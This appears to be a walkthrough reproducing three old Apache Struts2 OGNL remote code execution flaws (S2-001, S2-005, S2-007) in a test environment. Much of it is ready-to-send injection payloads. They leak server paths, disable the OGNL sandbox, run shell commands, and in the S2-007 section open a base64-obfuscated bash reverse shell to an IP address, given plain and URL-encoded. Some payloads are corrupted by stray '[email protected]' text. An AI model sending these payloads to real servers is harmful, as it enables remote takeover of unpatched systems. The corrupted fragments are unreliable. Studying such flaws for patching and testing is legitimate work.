Table of contents
1. S2-001 Remote Code Execution Vulnerability (CVE-2007-4556)
Vulnerability Profile
When the user submits the form data and the verification fails, the backend will parse the parameter value previously submitted by the user using the OGNL expression %{value}, and then refill it into the corresponding form data.
Sphere of influence
Struts 2.0.0 - 2.0.8
Vulnerability recurrence
输入%{
1+1},返回2就是存在该漏洞。
Get tomcat path
%{
"tomcatBinDir{"[email protected]@getProperty("user.dir")+"}"}
Get the real path of the website
%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
S2-005 Remote Code Execution Vulnerability (CVE-2010-1870)
Vulnerability Profile
The s2-005 vulnerability originated from s2-003 (affected version: earlier than Struts 2.0.12), and struts2 will parse each parameter name of http into an OGNL statement for execution (understandable as java code). OGNL expressions access struts objects through #. The struts framework prevents security issues by filtering # characters. However, security restrictions are bypassed through unicode encoding (\u0023) or octal (\43). For the S2-003 vulnerability, the official It is patched by adding security configuration (prohibiting static method calls and class method execution, etc.), but the security configuration is bypassed to cause vulnerabilities, and attackers can use OGNL expressions to open these two options
Affected version
Struts 2.0.0 - 2.1.8.1
bypass process
在S2-003中\u0023用于绕过Struts2的过滤器#
在s2-003,struts2添加安全模式(沙盒)之后
在s2-005中,使用OGNL表达式关闭安全模式并再次绕过
Vulnerability recurrence
Access the vulnerable environment
BP to capture packets
Modify the request method to POST
to construct the execution command
(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1
3. S2-007 Remote Code Execution Vulnerability (CVE-2012-0838)
Vulnerability Profile
age comes from user input, passing a non-integer to id will cause an error, struts2 will execute the user's input as an ongl expression, which will lead to a vulnerability, when the validation rule configured by -vaildation.xml. If the type verification conversion fails, the server will splice the form value string submitted by the user, and then perform OGNL expression parsing and return.
When the user age submits an int in the form of str, the server "'" + value + "'" will splice the code, and then use OGNL expressions to parse it. We need to find a form field configured with similar validation rules to generate conversion errors. You can then inject any OGNL expression code by injecting SQL single quotes
Sphere of influence
Struts 2.0.0 - 2.2.3
Vulnerability recurrence
Enter a non-numeric type in the age box and click to log in. The number in the age box changes as shown above, which proves that the vulnerability exists.
Check the root directory
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream())) + '
or
%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%20/%27%29.getInputStream%28%29%29%29+%2B+%27
rebound shell
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {
echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguMTQvOTk5OSAwPiYx}|{
base64,-d}|{
bash,-i}').getInputStream())) + '
or
%27%20%2b%20%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%66%6f%6f%3d%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%42%6f%6f%6c%65%61%6e%28%22%66%61%6c%73%65%22%29%20%2c%23%63%6f%6e%74%65%78%74%5b%22%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%22%5d%3d%23%66%6f%6f%2c%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%67%75%4d%54%51%76%4f%54%6b%35%4f%53%41%77%50%69%59%78%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%20%2b%20%27
